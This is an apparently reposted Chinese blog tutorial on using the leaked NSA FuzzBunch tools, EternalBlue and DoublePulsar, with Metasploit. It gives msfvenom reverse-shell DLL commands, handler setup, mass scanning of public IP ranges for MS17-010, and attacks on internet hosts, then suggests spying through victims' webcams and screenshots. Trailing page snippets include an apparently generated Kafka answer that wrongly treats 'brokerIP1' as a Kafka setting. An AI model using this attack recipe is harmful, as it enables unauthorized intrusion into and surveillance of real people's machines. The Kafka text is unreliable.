Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP

最新推荐文章于 2024-04-03 14:39:10 发布
转载 最新推荐文章于 2024-04-03 14:39:10 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Mrsm1th/p/6741557.html
文章标签:

#操作系统 #运维 #python

影子经纪人公开NSA的黑客工具,威胁全球70%的Windows机器。文章详细介绍如何使用fuzzbunch工具复现攻击,包括环境搭建、工具使用及对外网的攻击流程,同时涉及Python、Metasploit等技术。

0x01 前言

4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。
据了解,受影响的Windows 版本包括Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
正在使用这些Windows操作系统的你,有没有在颤抖!!虽然微软宣布已修复大部分的漏洞,但这场由于远程漏洞泄露造成的灾难性网络大地震“余震”仍在。
 
 成功的条件 靶机必须要关闭防火墙 且操作系统要低于win10 攻击机1 要关闭防火墙

0x02 fuzzbunch工具复现

攻击机1:win7 win8或者winxp(没测试过xp,应该也可以实现) ,并且要安装python2.6以及pywin32.exe     192.168.46.129
攻击机2:kali2.0 metasploit  192.168.46.131
靶机3:winxp   192.168.46.132
首先先运行工具包中的fb.py

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

use Eternalblue模块

然后一路回车到让你选择操作系统和模式 操作系统根据实际情况而定 但是模式要选择FB模式

一路回车 攻击

当出现win的时候说明攻击成功这时到攻击机2 kali上 先生成攻击文件并且将攻击文件上传至win7的目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

use exploit/multi/handler 模块 

将LHOST 设置成攻击机2 kali的ip 192.168.46.131

LPORT 设置为5555

exploit进行监听

返回攻击机1 win7

use doubleplusar模块

一路回车到

选择smb模式 x86系统 RunDLL 中填入开始生成文件的位置

一路回车 ATTACK

返回kali可以看到成功了

 

0x03 攻击外网

1.准备环境
攻击机1:vmware12.0中的win7+python2.6+pywin32win10+PentestBox-with-Metasploit
攻击机2:win10+PentestBox-with-Metasploit
2.win7连接外网
因为我们的目的是打外网,所以就需要win7也连接外网,首先将点击vmware左上角虚拟机中的设置选项,点击网络适配器,点击桥接模式,确定
 

然后点击编辑中的虚拟网络编辑器,点击更改设置,点桥接模式,确定,就可以连接另外一个宽带了

3.攻击机2准备工作

由于kaLi连接宽带比较麻烦,故我选择用本机win10系统作为攻击机2,这里安装PentestBox-with-Metasploit 这个软件是集成了metasploit,burpsuite等工具的测试环境,很好用,下载链接自行百度

然后 我们可以用msf大批量扫描网段  use auxiliary/scanner/smb/smb_ms17_010 这个模块

如果发现自己没有这个模块 在github上下载 https://github.com/rapid7/metasploit-framework/releases

然后将压缩包中 modules\auxiliary\scanner\smb\smb_ms17_010文件复制到pentestBox相应的地方就好了 这个模块就可以大批量扫描有这个漏洞 445端口的ip

可以用show options查看用法

set RHOST 设置你需要扫描的ip   111.111.111.1/24 

set RPORT 扫描端口 445

set THREADS 设置线程不要超过16  这里设置15

run 运行 就可以扫描了

黄色感叹号表示  可能有漏洞 可以利用

然后我们利用 use exploit/multi/handler  这个后门模块 监听自己的5555端口

将LHOST 设置成攻击机2 win10的ip

LPORT 设置为5555

exploit进行监听

4.攻击机1 win7准备工作

运行fb.py 

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

然后 use Eternalblue 也是一路按回车

这里会问你选择 winxp 还是win7win8 这个根据实际情况来定 一定要选择FB模式 

之后也是一路回车

 如果显示win的话表示成功

这里 use Doublepulsar模块 也是回车

选择SMB模式  x64位(操作系统位数) 这个也是根据情况来定

经过测试发现64位和32位的payload不一样payload生成方法 在kali中

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x64.dll  生成64位的dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x32.dll  生成32位dll文件

并将文件放至攻击机1 win7的c盘目录下

之后我们就回车 进行攻击 成功的话攻击机1会弹shell而且是system权限

后面的自己就可以测试了介绍一些成功后的语句

webcam_list:这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。

webcam_snap:这个命令主要是远程连接目标系统的摄像头。

 screenshot :桌面截图并且保存

等一系列好玩的

转载于:https://www.cnblogs.com/Mrsm1th/p/6741557.html

Berry2014
关注
【大数据】Flink + Kafka 实现通用流式数据处理详解
congge
10-27 1万+
Flink + Kafka 实现通用流式数据处理详解
消息中间件:Broker 消息代理软件实体 运行在服务器端
AI天才研究院
09-22 1961
Broker 是一种消息中间件软件,它负责接收、处理、分发应用程序之间的消息。消息代理是支持多种协议(例如 AMQP、MQTT、STOMP)的通用消息传递组件。根据 Wikipedia 的定义,“消息代理是一个独立于发送方和接收方的网络服务,用于中转或路由消息。它通常被设计成运行在远程服务器上,并充当消息队列或中间人角色”。与其他消息队列系统不同的是,消息代理在消息的发送方和接收方之间提供了一个中介层。
Metasploit实验:制作免杀payload+对任意“外网”主机的远控
wjwqp的专栏
04-09 3592
*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法 我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用!这是怎么做到的呢? 这个问题的实现需要拆分成下面三个模块 内网穿透到外网 制作免杀木马后门 Metasploit控制客户机 环境准备 操作系统 用途 IP地址 需要软件 Kali 制作payload,攻击,映射端口 ...
metasploit所有攻击方式(干货)
weixin_61216736的博客
09-30 1259
渗透 黑客 kali linux metasploit msf nmap sqlmap hydra
配置metasploit进行远程攻击的基本步骤和利用metasploit进行基本扫描
D-R0s1的博客
01-26 2589
metasploit的介绍         当完成前期的情报侦察工作以后,通过隐蔽的探测扫描识别到了系统的脆弱点,作为渗透测试人员要进一步的利用漏洞突破目标,获取利益和成就感。         Metasploit框架主要用于攻击工具的开发,漏洞工具的利用和攻击过程的辅助支撑,这个框架最大的优点在于它以研究的理念进行攻击工具的开发。因此,它非常容易开发和使用自己的metasploit模块,攻...
MSF弱点扫描
分享学习网络的点点滴滴
01-05 1060
● 根据信息收集结果搜索漏洞利用模块● 结合外部漏洞扫描系统对大IP地址段进行批量扫描● 误判率、漏判率。
渗透测试工具——Metasploit
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
网络测试工具ncat
侯刚的博客
09-17 9020
瑞士军刀,netcat,ncat使用介绍,网络连接测试,网络调试工具,黑客工具
Kafka:2)Kafka整合logstash实战
Javis486的专栏
12-20 6284
Kafka的安装部署,请参看http://blog.youkuaiyun.com/jiangpeng59/article/details/53241693
MQTT协议,终于有人讲清楚了
热门推荐
一名热爱技术的工程师的博客。分享技术干货,记录美好生活。永远相信美好的事情即将发生。
07-05 13万+
大家好,我是小麦,最近做了一个物联网的项目,顺便总结一下MQTT协议。大家都知道,MQTT协议在物联网中很常用,如果你对此还不是很了解,相信这篇文章可以带你入门。mqtt协议1 MQTT协...
网络端口扫描工具
06-29
网络端口扫描工具,用于扫描出指定公网ip下所有的开放的端口
metasploit工具(msf)
m0_73481504的博客
04-03 1971
Metasploit是一个广泛使用的开源渗透测试框架,它提供了大量的工具和模块,用于模拟各种安全攻击,帮助安全专业人员评估和增强系统的安全性。它由Rapid7公司的H.D. Moore在2003年创立,并且由一个庞大的社区支持。Metasploit包含了一个漏洞数据库,用户可以通过它来搜索和利用已知的安全漏洞。此外,Metasploit还具备生成后门、漏洞利用代码、木马、蠕虫等多种类型的恶意软件的能力。
fuzzbunch工具实现dll注入
Ms08067安全实验室
07-20 1069
文章来源|MS08067内网安全知识星球本文作者:BlackCat(Ms08067 内网小组成员)前言上阶段无意间接触到了这个工具,感觉功能还可以,在最近的hw中,测试发现,在一些08的...
Metasploit
辉小鱼的博客
11-03 608
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
ShadowBroker攻击框架FuzzBunch实战之EternalBlue
counsellor的专栏
04-17 1万+
环境准备: IP地址 角色 操作系统 必需依赖 备注 192.168.119.164 靶机 Win7 SP1 64-bits \ 关闭防火墙,保证没有2017年微软系统补丁 192.168.119.153 攻击机(主) WinXP SP3 32-bits Python2.6.6和pywin32安装包 python 2.6别太老,否则没有Scr
metasploit 使用教程
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
Metasploit渗透学习日记二
G46SEC
01-11 6369
情报收集 情报收集是渗透测试流程中的第二个步骤。情报收集的目的是获取渗透目标的准确信息,以了解目标组织的动作方式,确定最佳的进攻路线。如果情报收集工作不够细致,那么你可能会与可利用的系统漏洞或可实施攻击目标之交臂。 情报收集的工作可能会包含从网页中收集信息、google hacking、为特定的目标的网络拓扑进行完整的扫描映射等,这些工作往往需要较长的时间,会比较考验你的耐性。情报收集工作需
metasploit介绍及使用
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
kali扫描内网ip_Metasploit路由转发实现内网渗透
weixin_42349645的博客
12-10 1033
利用背景在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,扩大战果。现在假设的场景是此时我们已经拿下一台内网服务器的远程桌面环境,在进行内网渗透时,发现内网有大量存MS17-010的漏洞主机,如果我们想拿下这些主机,可能就要使用NSA工具箱,但是此工具箱的使用相当的麻烦,这里提供一个思路,我们可以...
brokerIP1=localhost
最新发布
03-28
<think>好的,我现在需要帮助用户解决关于如何正确配置Kafka中的brokerIP1设置为localhost的问题。首先,我需要回忆一下Kafka的相关配置参数,特别是brokerIP1的作用。记得brokerIP1是用来指定broker对外发布的IP地址,客户端会通过这个地址来连接broker。如果设置为localhost,可能会有问题,因为客户端可能无法从外部访问,尤其是在分布式环境中。 接下来,我需要确认用户的需求。用户可能是在本地开发环境测试,所以想用localhost,或者可能误解了这个参数的作用。需要明确正确的配置方法,以及使用场景和潜在的问题。 然后,我需要查阅相关的文档或引用资料。根据用户提供的引用,比如引用[1]提到监听器配置和发布到ZooKeeper的地址,这涉及到broker的监听地址配置。而brokerIP1可能与listeners参数相关,但可能需要更具体的配置方法。 还要注意,引用[3]提到Kafka的基本概念和分布式特性,说明在分布式环境中正确配置网络参数的重要性。引用[2]中的网络参数配置示例可能对调优有帮助,但用户的问题更偏向基础配置。 接下来,我需要组织回答的结构。首先解释brokerIP1的作用,然后给出配置方法,包括配置文件和示例。同时需要强调在开发和生产环境中的不同注意事项,比如开发环境可以用localhost,而生产环境需要真实IP或域名。此外,需要提到常见问题,比如客户端无法连接的情况,以及如何检查配置是否正确。 还要确保使用正确的LaTeX格式,行内公式用$...$,独立公式用$$...$$。不过这个问题可能涉及较少的数学公式,更多是配置指令和代码示例,所以需要正确使用代码块格式。 最后,生成相关问题,帮助用户进一步了解相关配置和优化,比如监听器配置、分布式环境调优等。</think>### 关于 Kafka 配置 `brokerIP1=localhost` 的说明 #### 1. **`brokerIP1` 的作用** - `brokerIP1` 是 Kafka Broker 配置参数,用于指定 Broker 对外发布的 IP 地址(即客户端连接的地址)。若未显式配置,默认使用本机 IP 地址[^3]。 - 若设置为 `localhost`,则 Broker 会向 ZooKeeper 注册 `127.0.0.1:9092` 作为监听地址,**仅允许本地客户端连接**,外部客户端无法访问[^1]。 #### 2. **配置方法** - **修改 `server.properties` 文件**: ```properties # 设置 Broker 对外发布的 IP 地址 brokerIP1=localhost # 监听地址需与发布地址一致(示例配置) listeners=PLAINTEXT://localhost:9092 advertised.listeners=PLAINTEXT://localhost:9092 ``` 此配置适用于**本地开发环境**,例如单机测试或容器化部署[^4]。 - **验证配置**: ```bash ./bin/kafka-topics.sh --list --bootstrap-server localhost:9092 ``` 若成功返回 Topic 列表,则配置生效。 #### 3. **使用场景与注意事项** - **适用场景**: - 本地开发环境(如 IDE 调试)。 - 容器化部署(如 Docker 容器内部通信)[^3]。 - **不适用场景**: - 生产环境或分布式集群(需配置真实 IP 或域名)[^1]。 - 跨网络访问场景(需配置公网可路由地址)[^2]。 #### 4. **常见问题排查** - **客户端连接失败**: - 检查 `advertised.listeners` 是否与 `brokerIP1` 一致。 - 确认防火墙是否放行端口(如 `9092`)。 - **ZooKeeper 注册异常**: - 确保 ZooKeeper 地址正确且可访问。 --- ### §§ 1. **如何配置 Kafka 监听器(`listeners`)以适应不同网络环境?** 2. **在分布式集群中如何优化 Kafka 的网络传输性能?** 3. **Kafka 的 `advertised.listeners` 和 `listeners` 参数有何区别?** --- ### 引用说明 : 监听器配置与 ZooKeeper 注册逻辑相关,需确保发布地址对客户端可见。 : 网络参数调优(如端口配置、连接数限制)直接影响跨节点通信性能。 [^3]: Kafka 的分布式特性要求正确配置网络参数以实现高可用性。 [^4]: 本地测试工具(如 `kafka-topics.sh`)依赖 `bootstrap-server` 地址的准确性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值